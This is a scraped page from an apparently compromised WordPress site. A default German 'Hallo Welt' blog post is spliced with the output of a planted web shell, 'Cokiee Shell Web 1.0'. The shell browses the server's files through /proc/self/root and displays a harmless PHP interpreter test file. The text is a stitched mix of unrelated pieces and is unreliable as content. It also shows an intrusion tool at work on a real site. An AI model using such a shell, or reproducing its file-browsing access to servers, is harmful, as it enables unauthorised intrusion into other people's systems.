Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/Zend/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/Zend/tests/dereference_014.phpt |
--TEST-- Trying to create an object from dereferencing uninitialized variable --FILE-- <?php error_reporting(E_ALL); class foo { public $x; static public $y; public function a() { return $this->x; } static public function b() { return self::$y; } } $foo = new foo; $h = $foo->a()[0]->a; var_dump($h); $h = foo::b()[1]->b; var_dump($h); ?> --EXPECTF-- Notice: Trying to get property 'a' of non-object in %s on line %d NULL Notice: Trying to get property 'b' of non-object in %s on line %d NULL
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare